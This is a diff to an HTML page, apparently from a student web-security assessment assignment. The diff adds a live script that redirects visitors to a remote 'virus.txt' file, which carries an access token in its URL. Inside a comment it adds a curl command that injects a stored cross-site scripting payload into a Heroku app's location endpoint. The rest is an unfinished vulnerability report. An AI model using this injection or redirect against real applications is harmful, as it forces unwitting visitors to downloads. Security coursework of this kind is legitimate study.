--- a/security/practice.html
+++ b/security/practice.html
@@ -15,9 +15,26 @@
 
 <!-- <script>window.document.getElementByID("map").innerHTML = "<p><a href='virus.txt' download></a></p>";</script>
 
-<p><a href='virus.txt' download></a></p> -->
+<p><a href='virus.txt' download></a></p> 
 
-<script> document.location.href = 'virus.txt'; </script>
+curl --data "login=<script> document.location.href = 'https://raw.githubusercontent.com/tuftsdev/comp20-jyang/master/security/examples/virus.txt?token=Ac8Ju3YoSwLSPnt2T127XWdADCoewghzks5aNFSdwA%3D%3D'; </script>&lat=0&lng=0" https://stark-journey-75501.herokuapp.com/sendLocation
+
+-->
+
+<script> document.location.href = "https://raw.githubusercontent.com/tuftsdev/comp20-jyang/master/security/examples/virus.txt?token=Ac8Ju3YoSwLSPnt2T127XWdADCoewghzks5aNFSdwA%3D%3D"; </script>
+
+<ul>
+	<li>Issue: Poor programming practice
+	<ul>
+	<li>Location of issue: Returning the landmarks to the map (index.js line 114)</li>
+	<li>Severity of issue: Low</li>
+	<li>Description of issue: All of the landmarks are shown</li>
+	<li>Proof of vulnerability:</li>
+	<li>Resolution:</li>
+	</ul>
+</li>
+</ul>
+
 
 </body>
 
